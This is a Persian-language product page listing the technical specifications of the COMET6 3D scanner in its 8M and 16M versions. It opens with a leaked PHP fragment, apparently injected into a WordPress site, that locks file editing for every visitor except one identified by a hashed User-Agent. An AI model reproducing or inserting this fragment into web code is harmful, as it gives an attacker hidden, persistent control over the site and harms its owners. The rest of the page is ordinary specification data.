if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } ob_start(); ?> COMET6 | آرمان سنجش گستر

اطلاعات دستگاه COMET6 

    Data Sheet 

دستگاه اسکنر سه بعدی COMET 6

 استفاده از دوربین های 8 و 16 مگاپیکسل

 دامنه های اندازه گیری 80/150/250/400/700/1200 میلیمتر

 تکنولوژی Blue LED در منبع نور پروژکتور

 استفاده از تکنولوژی منحصر بفرد تک دوربین

مشخصات فنی اسکنر سه بعدی COMET6

 

COMET 6 8M

COMET6 16M

وضوح

2472×3296

3264×4896

محدوده اسکن
(میلیمتر)

دامنه اندازه گیری 80: 40×64×86
دامنه اندازه گیری 150: 142
×106×80
دامنه اندازه گیری 250: 283
×213×160
دامنه اندازه گیری 400: 386×289×200
دامنه اندازه گیری 700: 666
×499×400
دامنه اندازه گیری 1200: 1216
×912×600

دامنه اندازه گیری 80: 40×54×81
دامنه اندازه گیری 150: 145
×97×80
دامنه اندازه گیری 250: 274
×193×160
دامنه اندازه گیری 400: 382×254×200
دامنه اندازه گیری 700: 656
×437×400
دامنه اندازه گیری 1200: 1235
×823×600

فواصل بین نقاط (میکرومتر)

دامنه اندازه گیری 80: 26 میکرومتر
دامنه اندازه گیری 150: 43 میکرومتر

دامنه اندازه گیری 250: 86 میکرومتر
دامنه اندازه گیری 400: 117 میکرومتر
دامنه اندازه گیری 700: 202 میکرومتر
دامنه اندازه گیری 1200: 369 میکرومتر

دامنه اندازه گیری 80: 16 میکرومتر
دامنه اندازه گیری 150: 30 میکرومتر

دامنه اندازه گیری 250: 56 میکرومتر
دامنه اندازه گیری 400: 78 میکرومتر
دامنه اندازه گیری 700: 134 میکرومتر
دامنه اندازه گیری 1200: 252 میکرومتر

فاصله بهینه اسکنر تا جسم

دامنه اندازه گیری 80: 420 میلیمتر
دامنه اندازه گیری 150: 600 میلیمتر
دامنه اندازه گیری 250: 600 میلیمتر
دامنه اندازه گیری 400: 785 میلیمتر
دامنه اندازه گیری 700: 785 میلیمتر
دامنه اندازه گیری 1200: 1400 میلیمتر

دامنه اندازه گیری 80: 420 میلیمتر
دامنه اندازه گیری 150: 600 میلیمتر
دامنه اندازه گیری 250: 600 میلیمتر
دامنه اندازه گیری 400: 785 میلیمتر
دامنه اندازه گیری 700: 785 میلیمتر
دامنه اندازه گیری 1200: 1400 میلیمتر

سریعترین زمان اندازه برداری

کمتر از 1 ثانیه

در حدود 1/2 ثانیه

موقعیت قرارگیری سنسور

سه پایه یا سنسور ایستاده همراه با چرخش دستی

سه پایه یا سنسور ایستاده همراه با چرخش دستی

موقعیت قرارگیری قطعه

میز دوار

میز دوار

نرم افزار

مجموعه نرم افزار Zeiss Colin 3D

مجموعه نرم افزار Zeiss Colin 3D